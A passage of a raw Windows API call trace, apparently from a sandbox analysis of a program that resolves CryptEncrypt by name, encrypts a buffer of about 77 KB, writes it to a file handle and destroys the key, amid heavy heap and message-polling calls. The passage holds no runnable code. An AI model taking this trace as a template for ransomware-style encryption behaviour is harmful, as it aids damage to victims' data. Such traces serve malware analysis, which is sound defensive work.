Flags=0x0, Size=0x4) returned 0x2e55048 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e80 [0264.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.029] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0x12e2a, dwBufLen=0x12e30 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0x12e30) returned 1 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0264.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0264.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0264.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.038] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.038] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0264.040] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.040] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.040] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.040] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0264.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.041] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.054] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x12e30, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x12e30, lpOverlapped=0x0) returned 1 [0264.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.061] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.062] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.062] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0264.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.062] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.063] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0264.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e519a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0264.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.063] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.064] CryptDestroyKey (hKey=0xa87350) returned 1 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0264.066] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.066] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 